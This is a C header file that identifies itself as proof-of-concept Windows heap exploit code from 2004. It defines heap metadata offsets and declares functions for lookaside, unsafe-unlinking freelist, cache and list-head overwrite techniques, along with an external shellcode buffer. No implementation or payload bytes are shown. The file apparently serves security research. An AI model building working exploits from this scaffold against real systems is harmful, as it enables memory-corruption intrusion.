// Proof-of-concept code heap exploit code
// Written by Matt Conover in December 2004
#define FREELIST_OFFSET 0x178
#define FREELIST_SIZE 8
#define LOOKASIDE_OFFSET 0x688
#define LOOKASIDE_SIZE 48
#define CACHE_OFFSET 0x170

#define LOOKASIDE_FILL_SIZE 4
#define ALLOC_SIZE 64
#define CHUNK_SIZE ((ALLOC_SIZE/8)+1)
#define ALLOC_SIZE2 72
#define CHUNK_SIZE2 ((ALLOC_SIZE2/8)+1)

void DoRandomAllocsAndFrees(HEAP *pHeap, DWORD MinChunkSize, DWORD MaxChunkSize);
void FillLookasideList(HEAP *pHeap, DWORD AllocSize);
void EmptyLookasideList(HEAP *pHeap, DWORD AllocSize);
BYTE *GetChunk(HEAP *pHeap, DWORD AllocSize);
BOOL InitialHeapCache(HEAP *Heap);

BYTE *DoChunkOnLookasideOverwrite(HEAP *pHeap);
BYTE *DoUnsafeUnlinkingFreeListOverwrite(HEAP *pHeap);
BYTE *DoCacheOverwrite(HEAP *pHeap);
BYTE *DoListHeadOverwrite(HEAP *pHeap);

DWORD GetChunkIndex(HEAP_CACHE *Cache, DWORD ChunkSize);

extern BYTE *Shellcode;
extern DWORD ShellcodeLength;
extern BYTE *FirstFreeList, *FirstLookaside;